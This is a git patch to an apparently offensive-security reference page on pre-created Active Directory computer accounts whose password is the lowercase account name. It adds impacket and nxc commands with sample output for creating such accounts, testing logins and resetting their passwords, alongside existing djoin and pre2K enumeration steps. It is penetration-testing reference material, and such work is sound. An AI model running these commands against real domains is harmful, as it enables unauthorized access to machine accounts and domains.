From c77236f6eb0f585f31d82e64d1b75ab5de3dee0c Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 20 Nov 2024 22:31:57 +0100 Subject: [PATCH] Server with password=lower(machine-account-name) --- .../pwd-precreated-computer.md | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/docs/active-directory/pwd-precreated-computer.md b/docs/active-directory/pwd-precreated-computer.md index 9ff81cf..d62a743 100644 --- a/docs/active-directory/pwd-precreated-computer.md +++ b/docs/active-directory/pwd-precreated-computer.md @@ -1,6 +1,6 @@ # Password - Pre-Created Computer Account -When `Assign this computer account as a pre-Windows 2000 computer` checkmark is checked, the password for the computer account becomes the same as the computer account in lowercase. For instance, the computer account **SERVERDEMO$** would have the password **serverdemo**. +When `Assign this computer account as a pre-Windows 2000 computer` checkmark is checked, the password for the computer account becomes the same as the computer account in lowercase. For instance, the computer account **SERVERDEMO$** would have the password **serverdemo**. ```ps1 # Create a machine with default password @@ -11,6 +11,20 @@ djoin /PROVISION /DOMAIN /MACHINE evilpc /SAVEFILE C:\temp\evilpc.txt /DE * When you attempt to login using the credential you should have the following error code : `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT`. * Then you need to change the password with [rpcchangepwd.py](https://github.com/SecureAuthCorp/impacket/pull/1304) + ```ps1 + python3 rpcchangepwd.py '/COMPUTER>$':''@ -newpass '' + ``` + +:warning: When the machine account name and the password are the same, the machine will also act like a pre-Windows 2000 computer and the authentication will result in `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT`. + +```ps1 +$ impacket-addcomputer -dc-ip 10.10.10.10 EXODIA.LOCAL/Administrator:P@ssw0rd -computer-name swkserver -computer-pass swkserver +[*] Successfully added machine account swkserver$ with password swkserver. + +$ nxc smb 10.10.10.10 -u 'swkserver$' -p swkserver +SMB 10.10.10.10 445 WIN-8OJFTLMU1IG [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN-8OJFTLMU1IG) (domain:EXODIA.LOCAL) (signing:True) (SMBv1:False) +SMB 10.10.10.10 445 WIN-8OJFTLMU1IG [-] EXODIA.LOCAL\swkserver$:swkserver STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT +``` ## Enumerate Pre-Created Computer Account @@ -20,7 +34,6 @@ Identify pre-created computer accounts, save the results to a file, and obtain T nxc -u username -p password -M pre2K ``` - ## References -* [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/) \ No newline at end of file +* [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/)